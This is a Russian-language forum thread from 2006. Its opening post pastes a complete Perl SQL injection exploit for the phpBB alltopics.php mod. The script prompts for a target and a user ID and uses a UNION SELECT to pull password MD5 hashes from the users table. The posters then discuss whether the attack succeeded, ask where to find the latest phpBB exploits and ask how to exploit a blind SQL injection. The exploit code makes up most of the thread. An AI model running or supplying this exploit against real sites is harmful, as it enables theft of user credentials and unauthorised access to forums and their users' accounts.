phpBB All Topics Mod 2.0.21
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
phpBB All Topics Mod 2.0.21 - 2006-09-14 20:04:06.780000
|
|
|
Siecker
Сообщений: 2
Оценки: 0
Присоединился: 2006-09-14 19:58:50.013333
|
#!/usr/bin/perl print q{ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++ + + + phpBB 2.0.21 (alltopics.php) SQL Injection Exploit + + + + bd0rk || SOH-Crew + + + + Mod:http:"//"www".phpbbhacks.com/download/2821 + + + ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++ }; use IO::Socket; print q{ => Insert URL => without ( http ) => }; $server = <STDIN>; chop ($server); print q{ => Insert directory => es: /forum/ - /phpBB2/ => }; $dir = <STDIN>; chop ($dir); print q{ => User ID => Number: => }; $user = <STDIN>; chop ($user); if (!$ARGV[2]) { } $myuser = $ARGV[3]; $mypass = $ARGV[4]; $myid = $ARGV[5]; $server =~ s/(http:\/\/)//eg; $path = $dir; $path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ; print " => Exploit in process…\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "Exploit failed"; print "Exploit\r\n"; print "in process…\r\n"; print $socket "GET $path HTTP/1.1\r\n"; print $socket "Host: $server\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\r\n"; print "Exploit finished!\r\n\r\n"; while ($answer = <$socket>) { if ($answer =~/(\w{32})/) { if ($1 ne 0) { print "MD5-Hash is: ".$1."\r\n"; } exit(); } } Заталкал в интерпритатор perl запустил, все указал, в конце написал Exploit finished! и автоматом вышел. Собствено спрашивается, взлом удался?! А как он удался? Как работает скрипт? Может кто расказать? Ну написал он мне Exploit finished! И что, я начинающий секюрити админ, ооочень начинающий :)
|
|
|
RE: phpBB All Topics Mod 2.0.21 - 2006-09-14 20:41:53.606666
|
|
|
Ванька
Сообщений: 57
Оценки: 0
Присоединился: 2006-08-29 17:16:25
|
print "MD5-Hash is: ".$1."\r\n"; эта строчка выводит пароль в мд5. если у тебя там ниче не вывелось, после Exploit Finished, значит форум пропатчен.
|
|
|
RE: phpBB All Topics Mod 2.0.21 - 2006-09-14 21:11:33.903333
|
|
|
Siecker
Сообщений: 2
Оценки: 0
Присоединился: 2006-09-14 19:58:50.013333
|
Я использовал ActivePerl-5.8.6.811-MSWin32-x86-122208 файлы pl асациируется на него, я запускаю все ОК, но как только показывается надпись Exploit Finished он сразу выходит, я не успеваю посмотреть есть ли там MD5. Как сделать что б небыло этого? И последнее где можно найти самые свежие эксплоиты для phpbb? Просто я нашел уязвимость SQL-Инъекция, слепая. Дыра есть. Но как ее реализовать?
|
|
|
|
|